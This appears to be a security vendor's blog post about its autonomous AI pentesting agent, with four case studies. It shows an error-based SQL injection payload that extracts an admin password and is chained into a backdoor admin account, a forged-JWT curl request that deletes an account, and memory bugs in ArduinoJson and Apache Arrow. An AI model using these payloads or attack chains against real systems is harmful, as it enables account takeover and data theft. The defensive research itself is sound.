How Deep Agentic Scan Catches Tricky Real-World Vulnerabilities
How Ostorlab's Deep Agentic Scan uncovers and empirically proves complex vulnerabilities across web, mobile, and source code, in four real case studies.
A Deep Agentic Scan is an autonomous penetration test that reasons about an application the way a human researcher does, then proves each finding by running it. Instead of flagging suspicious code or spraying generic payloads, it builds a working exploit, captures the runtime evidence, and reports only what it can reproduce. This article walks through four real examples.
Executive Summary (TL;DR)
What to expect from a Deep Agentic Scan?
A Deep Agentic Scan delivers empirically proven, multi-step exploit chains rather than unverified theoretical alerts. Output results make it easier to reproduce findings through live dynamic verification traces (such as AddressSanitizer, Valgrind, and Frida), traffic interception, extracted credential proof, and actionable root-cause remediation across all APIs, web apps, mobile apps, and source code repositories.
Traditional automated security scanners (DAST and SAST) remain essential for baseline coverage, rapid regression checks, and broad vulnerability discovery across thousands of assets. However, when dealing with complex, multi-layered attack surfaces, standard automated scans often hit an invisible ceiling. Static analyzers can flag theoretical warnings that require manual triage. Standard dynamic scanners spray generic payloads into forms, missing intricate multi-step business logic flaws. Dynamic fuzzers mutate inputs blindly, crashing into early validation barriers or swallowing errors in test harnesses.
To truly understand whether a system is vulnerable, an AI security platform cannot simply guess, match known regex signatures, or point at suspicious syntax. It must think, plan, and verify like an experienced security researcher, while operating within strict safety boundaries.
This is the core design philosophy behind Ostorlab's Deep Agentic Scan, a comprehensive platform for autonomous penetration testing and deep security analysis across web applications, mobile applications (Android and iOS), API endpoints, networks, and source code repositories. Deep Agentic Scan orchestrates autonomous agents that reason about execution flows, navigate complex application states, craft precision exploits, and empirically confirm findings through dynamic verification.
| Capability Dimension | Traditional Scanners (DAST / SAST) | Deep Agentic Scan Results |
|---|---|---|
| Verification Level | Rapid rule-based pattern matching & surface alerts | Empirical dynamic proof (exact PoC, exit codes, sanitizer & dynamic traces) |
| Logic and State Depth | Single-request boundary testing (broad coverage) | Multi-stage chained exploitation (SQLi → Auth Takeover → Exfiltration) |
| Taint and Memory Analysis | Static taint analysis, limited Frida hooks | Live origin tracking (dynamic instrumentation, ASan, and Valgrind memory tracking) |
| Deliverable Evidence | Vulnerability score and descriptive advisory | Validated exploit proof making issues straightforward to reproduce |
Testing Environment & Methodology
The four case studies analyzed below were investigated and validated in authorized sandbox environments during benchmarking and security research evaluations. Deep Agentic Scan operates within controlled boundaries to empirically establish exploitability before reporting. While this article focuses on selected findings uncovered across web applications, APIs, and source code, Deep Agentic Scan provides identical autonomous depth across mobile applications (Android and iOS) and networks. These case studies represent just a handful of examples demonstrating the agent's autonomous verification.
In this article we examine four tricky real-world vulnerabilities uncovered by Deep Agentic Scan starting with high-impact web and API exploit chains followed by complex memory-safety flaws hidden deep within source code repositories.
Finding 1: Multi-Step Error-Based SQL Injection & Account Takeover via Database Type Casting
Modern APIs often separate their ingestion layer from internal database queries. When input parameters are expected to be integers many applications rely on database-level type coercion rather than strict upfront schema validation. This subtle design choice can open an unexpected attack vector.
In a digital banking and fintech platform handling sensitive transactions, an API endpoint was designed to schedule bill payments:
POST /api/bill-payments/create HTTP/1.1
Content-Type: application/json
Authorization: Bearer <user_token>
{
"biller_id": 104,
"amount": 50.00,
"payment_method": "balance"
}
The SQL Injection Vulnerability Pattern
While parameters like amount and payment_method were validated, the backend constructed the underlying SQL INSERT statement by interpolating user input directly into the query string:
INSERT INTO bill_payments (biller_id, amount, payment_method)
VALUES ({user_biller_id}, {amount}, '{payment_method}')
With VALUES ({user_biller_id}, ...), the input is spliced directly into the integer biller_id column position. Because the database engine expected biller_id to be an integer, it attempted an explicit type conversion (CAST). When an input string or subquery result cannot be converted to an integer, the database throws a runtime conversion exception and includes the offending string verbatim in the error response.
How Deep Agentic Scan Solved the SQL Injection
Rather than settling for standard boolean or time-based blind SQL injection techniques, which require hundreds of HTTP round-trips, the autonomous pentesting agent deduced how to turn the database's own error handling into an exfiltration channel:
- Subquery Type-Mismatched Injection: The agent crafted a subquery designed to pull the plaintext administrative password and force a type-cast to integer:
json { "biller_id": "(SELECT CAST(password AS integer) FROM users WHERE username='admin' LIMIT 1)", "amount": 5.00, "payment_method": "balance" } - Immediate Credential Extraction: The database evaluated the subquery first, fetched the string password, attempted to cast it to an integer, failed, and returned:
json { "status": "error", "message": "invalid input syntax for type integer: \"Compromised123!\"" } - Multi-Stage Exploitation Chain: The agent did not simply stop at reporting a SQL injection alert. Acting as a true autonomous penetration tester it chained this finding into full administrative compromise:
- Authenticated against
/loginwith the harvestedadmincredentials, acquiring an administrative session. - Leveraged the elevated privileges to call
/admin/create_admin, creating a persistent backdoor admin account. - Queried internal GraphQL endpoints (
query { transactionSummary { ... } }), dumping billions in aggregate transaction volume and ledger data.

Finding 2: Complete Authentication Bypass via Unverified JWT Signatures in Financial APIs
JSON Web Tokens (JWT) are ubiquitous in modern applications. A JWT consists of three base64-encoded segments: Header, Payload, and Signature. Security relies entirely on the server verifying that the signature matches the header and payload using a trusted cryptographic key.
The JWT Signature Vulnerability Pattern
In the administrative control panel of a financial web application, endpoints were protected by a token authentication filter. However, the underlying implementation relied on a fatal shortcut:
# Vulnerable implementation pattern
def verify_token(token):
try:
# Decodes the payload WITHOUT validating the HMAC cryptographic signature
payload = jwt.decode(token, options={"verify_signature": False})
if payload and payload.get('is_admin') is True:
return payload
except Exception:
return None
The application inspected the token, parsed the JSON claims, and confirmed the claim value was true for is_admin. But it omitted signature validation entirely.
How Deep Agentic Scan Solved the JWT Authentication Bypass
Deep Agentic Scan identified and confirmed this vulnerability through rigorous hypothesis testing:
- Baseline Differential Probing: Unauthenticated requests to administrative endpoints such as
POST /admin/create_adminorPOST /admin/delete_account/<id>returned401 Unauthorized("Token missing"). - Signature Independence Hypothesis: The agent constructed a completely forged token with an arbitrary payload and a literal dummy string signature:
text eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjo5OTk5OSwidXNlcm5hbWUiOiJ0b3RhbGx5X2Zha2VfdXNlciIsImlzX2FkbWluIjp0cnVlLCJpYXQiOjk5OTk5OTk5OTl9.Y29tcGxldGVseV9mYWtlX3NpZ25hdHVyZQ(The signature segmentY29tcGxldGVseV9mYWtlX3NpZ25hdHVyZQliterally base64-decodes to"completely_fake_signature"). - Empirical Execution Proof: Operating strictly within non-destructive testing guardrails, the agent first registered a disposable test account (
id: 5) during its scan setup. It then dispatched an administrative command using the forged token to delete that specific test-created record:bash curl -X POST "https://target-platform/admin/delete_account/5" \ -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjo5OTk5OSwidXNlcm5hbWUiOiJ0b3RhbGx5X2Zha2VfdXNlciIsImlzX2FkbWluIjp0cnVlLCJpYXQiOjk5OTk5OTk5OTl9.Y29tcGxldGVseV9mYWtlX3NpZ25hdHVyZQ"The server returned:json { "status": "success", "message": "Account deleted successfully", "debug_info": { "deleted_by": "totally_fake_user", "deleted_user_id": 5 } }By confirming that the API successfully executed the administrative deletion and echoeddeleted_by: "totally_fake_user"from the forged token payload, the agent proved complete authentication bypass and administrative takeover.

Finding 3: Uninitialized Stack Memory Leak & Taint Exfiltration in C++ Data Parsers
When developers optimize high-performance or embedded parsers, code size and execution speed are often balanced against defensive programming. A common intuition is that if an attacker sends malformed data, returning garbage output is harmless: "garbage in, garbage out."
During an autonomous source code scan of a C++ repository, Deep Agentic Scan encountered this pattern. In compiled languages, uninitialized state is never just harmless garbage data, it triggers undefined behavior under the language specification, leading directly to memory disclosure and exploitable taint propagation.
The Uninitialized Stack Memory Vulnerability Pattern
In an older version of ArduinoJson, a widely used C++ JSON library designed for embedded systems, Unicode escape sequences (\uXXXX) outside the Basic Multilingual Plane are represented using UTF-16 surrogate pairs. Because standard \uXXXX escapes only hold 4 hex digits (up to 0xFFFF), characters with higher code points cannot fit into a single escape. Instead, they require two consecutive 16-bit units: a high surrogate (0xD800 to 0xDBFF) followed by a low surrogate (0xDC00 to 0xDFFF), which the parser recombines into a single character.
To minimize code size and memory footprint on resource-constrained devices, the internal Utf16::Codepoint class defined private state variables on the stack without default initializers:
// json/utf16.hpp
class Codepoint {
private:
uint16_t _highSurrogate; // Line 55: Declared without an initializer
uint32_t _codepoint;
};
Recognizing that _highSurrogate might be read before assignment when an invalid surrogate sequence is supplied, the library explicitly suppressed the compiler's uninitialized warning with an inline comment:
// The high surrogate may be uninitialized if the pair is invalid,
// we choose to ignore the problem to reduce the size of the code
// Garbage in => Garbage out
#if defined(__GNUC__) && __GNUC__ >= 7
#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
#endif
During deserialization, Utf16::Codepoint::append() only populates _highSurrogate when it encounters a valid high surrogate (utf16.hpp:36). If the parser instead receives a lone low surrogate (such as \uDC00) without an initial high surrogate, control branches straight into the low-surrogate decoding logic:
bool append(uint16_t codeunit) {
if (isHighSurrogate(codeunit)) {
_highSurrogate = codeunit & 0x3FF; // The only write site
return false;
}
if (isLowSurrogate(codeunit)) {
// Reads uninitialized stack memory from _highSurrogate
_codepoint = uint32_t(0x10000 + ((_highSurrogate << 10) | (codeunit & 0x3FF)));
return true;
}
_codepoint = codeunit;
return true;
}
Because _highSurrogate was never initialized on the stack frame, append() performs bitwise arithmetic on stale stack bytes. The tainted _codepoint is returned via value() and forwarded directly to the UTF-8 serialization sink in Utf8::encodeCodepoint():
// src/ArduinoJson/Json/Utf8.hpp:21
// The library builds the UTF-8 byte stream in reverse into a local buffer:
if (codepoint32 < 0x80) { // Conditional branch depends on uninitialized value
*(p++) = char(codepoint32);
} else {
*(p++) = char((codepoint32 | 0x80) & 0xBF); // Continuation byte
uint16_t codepoint16 = uint16_t(codepoint32 >> 6);
if (codepoint16 < 0x20) {
*(p++) = char(codepoint16 | 0xC0); // 2-byte leading byte
} else {
*(p++) = char((codepoint16 | 0x80) & 0xBF);
codepoint16 = uint16_t(codepoint16 >> 6);
if (codepoint16 < 0x10) {
*(p++) = char(codepoint16 | 0xE0); // 3-byte leading byte
} else {
*(p++) = char((codepoint16 | 0x80) & 0xBF);
codepoint16 = uint16_t(codepoint16 >> 6);
*(p++) = char(codepoint16 | 0xF0); // 4-byte leading byte
}
}
}
This tainted value materially dictates the emitted UTF-8 byte stream, causing residual stack memory from prior function calls to be serialized straight into the output string.
How Deep Agentic Scan Tracked the Memory Leak
Compiler warning suppressions on uninitialized variables are often dismissed as theoretical or harmless "garbage in, garbage out" behavior. To establish whether this flaw represents an exploitable security risk, Deep Agentic Scan executed an autonomous verification workflow across two distinct phases: surgical payload generation and dynamic memory-tracking analysis.
1. Baseline Differential Synthesis
The agent first formulated a differential hypothesis: a valid benign input must parse cleanly with zero memory anomalies, whereas a targeted lone low surrogate must trigger the uninitialized read.
Rather than sending random fuzz bytes or deeply nested structures that might trip unrelated syntax errors, the agent synthesized a targeted 8-byte JSON scalar payload "\uDC00" alongside a control input {"a":"hello"}:

2. Dynamic Memory Origin Tracking with Valgrind
To capture use-of-uninitialized-memory bugs dynamically, compilers offer MemorySanitizer (MSan), while runtime binary instrumentation relies on Valgrind Memcheck (the industry-standard dynamic analysis tool for Linux memory error detection). When container security constraints restricted MemorySanitizer from modifying address space randomization (ADDR_NO_RANDOMIZE), the agent dynamically adapted its strategy by compiling a standalone harness and executing it under Valgrind Memcheck with --track-origins=yes and --error-exitcode=77:

The resulting execution trace provided end-to-end evidence of the exploit chain:
- Stack Origin (
json_deserializer.hpp:357): Valgrind's shadow memory tracker identified the exact moment the uninitialized memory was allocated on the stack insideparseQuotedString(), corresponding to the uninitialized_highSurrogatemember. - First Tainted Branch (
utf8.hpp:21): Whenappend(0xDC00)computed the codepoint using the uninitialized surrogate state,encodeCodepoint()evaluatedif (codepoint32 < 0x80). Valgrind immediately intercepted this decision point as aConditional jump or move depends on uninitialised value(s). - Exfiltration into Serialized Output (
text_formatter.hpp:38): Subsequent warnings atTextFormatter::writeStringconfirmed that this was not merely an internal arithmetic anomaly. The corrupted codepoint was converted into UTF-8 bytes and written directly into the serialized JSON output string, proving that residual stack memory from preceding execution frames is disclosed to any client consuming the parsed output. - Deterministic Exit Code (
77): While the benign baseline executed with zero errors and returned exit code0, the trigger PoC exited with code77, providing clear differential verification.

Finding 4: Heap Out-of-Bounds Memory Corruption Bypassing Fuzzer Test Harnesses
During an autonomous source code scan of an earlier version of Apache Arrow (a widely used high-performance columnar data framework), Deep Agentic Scan uncovered an architectural discrepancy between internal test harnesses and actual client APIs.
The Out-of-Bounds Read Vulnerability Pattern
In Apache Arrow (handling high-speed IPC and network streams), data interchange relies on binary serialization formats. When deserializing incoming message metadata, the framework copies field attributes from the binary message headers directly into internal metadata structures:
// ipc/reader.cc:166-179
Status GetFieldMetadata(int field_index, ArrayData* out) {
const flatbuf::FieldNode* node = nodes->Get(field_index);
out->length = node->length();
out->null_count = node->null_count();
out->offset = 0;
return Status::OK();
}
However, the reader never verified that the physical buffers supplied alongside the metadata were large enough to accommodate the declared out->length.
Because the framework is optimized for zero-copy high-throughput analytics, subsequent array operations omit runtime bounds checks on element access:
// array/array_binary.h:94-96
/// \brief Return the data buffer absolute offset of the data for the value at the passed index.
/// Does not perform boundschecking
offset_type value_offset(int64_t i) const {
return raw_value_offsets_[i + data_->offset];
}
In Apache Arrow binary arrays, offsets are stored as 32-bit (4-byte) integers. An array declaring length = 50000 requires 50001 offset integers (approximately 200,004 bytes, or ~200 KB) to delimit the string boundaries. If an incoming stream declares length = 50000 but only supplies a 24-byte buffer (which only holds 6 integers), any access beyond index 5 steps outside the allocated buffer.
How Deep Agentic Scan Bypassed the Fuzzer Blind Spot
Why was this vulnerability missed by existing continuous fuzzing harnesses?
The repository's internal fuzz target contained an explicit validation call after reading each batch:
// stream_fuzz.cc
Status status = batch->ValidateFull();
DISCARD_UNUSED(status);
ValidateFull() properly detected that the 24-byte buffer was far smaller than the ~200 KB required for 50,000 entries and returned an error Status::Invalid. However, the fuzzer harness discarded the return value with DISCARD_UNUSED and terminated cleanly with exit code 0. To the fuzzer, the execution was completely clean.
More importantly, the public client API (RecordBatchStreamReader::ReadNext()) does not call ValidateFull(). Invoking full structural validation on every batch would incur severe performance overhead in high-throughput streaming pipelines. Real-world applications consuming untrusted streams directly via the public API were left completely unguarded.
Deep Agentic Scan recognized this exact divergence:
- Differential API Analysis: The agent recognized that the clean exit in the fuzz target was an artifact of error swallowing, while real consumer code consumes batches without full validation.
- Crafting the Mutated IPC Stream: The agent took a valid 336-byte IPC stream file that originally contained 5 elements and edited its length header fields from 5 to 50000. This created a malicious stream where the metadata claims 50,000 rows, while the data payload itself remains tiny.
- End-to-End API Verification: The agent authored a standalone verification harness linking the public library and exercising
RecordBatchStreamReader::OpenandReadNextunder AddressSanitizer:

Examining the resulting diagnostic output demonstrates how the mismatch unfolds directly into heap memory corruption and termination:

The trace confirms the bug across three dimensions:
- The Buffer Inconsistency: The stream metadata declared Batch num_rows: 50000 requiring 50001 int32 entries (~200 KB) for offsets, yet the payload supplied an offsets buffer of only 24 bytes (6 entries).
- Out-of-Bounds Heap Reads Proven: The diagnostic output proves out-of-bounds reads in action. Valid buffer entries ended at index 5 (value_offset(5) = 23). Starting at index 6 through 14, the harness continued indexing into heap memory beyond the 24-byte buffer, printing garbage memory values (1819043176, 1919907695, 1918985324) that leaked surrounding heap content.
- Segmentation Fault on Unmapped Memory: As the harness stepped further out of bounds toward value_offset(49999) (attempting to read ~200 KB ahead), it hit an unmapped memory page. AddressSanitizer intercepted the illegal read (SEGV on unknown address 0x614000030e94) inside arrow::BaseBinaryArray<arrow::BinaryType>::value_offset(long) at array_binary.h:95:12, cleanly aborting execution with exit code 134.
Key Takeaways: How Autonomous Agents Shift Security Testing
Finding critical security flaws in production applications requires moving beyond passive scanners and static rule-matching. Across web backends, mobile apps, and source code repositories, vulnerabilities emerge where developers make assumptions that are never validated at runtime.
The four findings detailed in this article highlight the practical advantages of an agentic approach to security testing:
- Multi-Step Attack Chaining: In the financial SQL injection finding, the agent did not stop when it triggered a database error. It formulated an extraction subquery, harvested the admin password, logged into the administrative portal, created a persistent backdoor user, and dumped financial records. Real security testing requires following through across multiple application steps.
- Context-Aware Logic Synthesis: For the JWT authentication bypass, the agent deduced that the server checked claims without verifying the cryptographic signature, forged an administrative token with a fake signature, and confirmed access when the API processed the privileged request.
- Differential Verification Eliminates Noise: With uninitialized memory in ArduinoJson, static warnings had already been examined and intentionally ignored by developers under a "garbage in, garbage out" assumption. The agent compiled a test harness, executed it under Valgrind Memcheck with origin tracking, and proved that uninitialized stack bytes actually leak into the serialized output, exiting deterministically with code
77. - Testing Public Client APIs: In Apache Arrow, automated fuzzing never triggered because the repository's internal fuzz harness caught the invalid batch with
ValidateFull()and discarded the error. The agent recognized that real client applications useRecordBatchStreamReader::ReadNext(), which skips validation for high performance, and proved memory corruption on the actual public API under AddressSanitizer.
By combining contextual code analysis with hands-on dynamic verification, Deep Agentic Scan turns theoretical risk into reproducible engineering evidence.
Frequently Asked Questions (FAQ)
How does a Deep Agentic Scan differ from standard dynamic application security testing (DAST)?
While standard DAST tools spray pre-configured payloads into single HTTP inputs, a Deep Agentic Scan uses autonomous AI agents to understand business logic, track application state across multi-step user workflows, and chain separate low-severity findings into end-to-end exploit proofs.
Does a Deep Agentic Scan produce false positives?
Deep Agentic Scans reduce false positives through dynamic verification. Rather than reporting a potential flaw based on pattern matching, the agent executes targeted reproduction harnesses and confirms the impact (e.g., observing memory corruption under AddressSanitizer or verifying privilege escalation via an administrative action) before reporting the issue, all while operating under strict guardrails to avoid performing actions that could be problematic in a production environment (such as never deleting existing user accounts or records unless explicitly created during the test).
What assets can be tested using Deep Agentic Scan?
Deep Agentic Scan operates across web applications, all APIs (REST, GraphQL, gRPC, and custom protocols), mobile applications (iOS and Android), cloud infrastructure, and all source code repositories.
What guardrails ensure the scan does not go out of scope?
Deep Agentic Scan features comprehensive multi-layer safety guardrails designed to minimize out-of-scope actions without compromising testing depth or code evaluation quality: - Scope & Firewall Blacklisting: During scan creation, users can specify explicit blacklists and firewall exclusion rules to isolate sensitive environments (such as live production databases or critical payment gateways). - Configurable Rate Limits (QPS): Users can configure custom rate limits (queries per second) in the scan creation step to ensure scanning traffic never overwhelms servers, causes service degradation, or triggers anti-DDoS thresholds. - Custom Guardrail Prompts: Security teams can configure custom guardrail prompts directly in the scan setup. - Real-Time Tool-Call Inspection: A dedicated supervising agent monitors and inspects every tool call before execution to strictly verify that target parameters, URLs, and payloads remain strictly within the authorized scope. - Non-Destructive State Policies: Agents enforce reversible operations and non-destructive state rules, never altering or deleting pre-existing user records or operational data.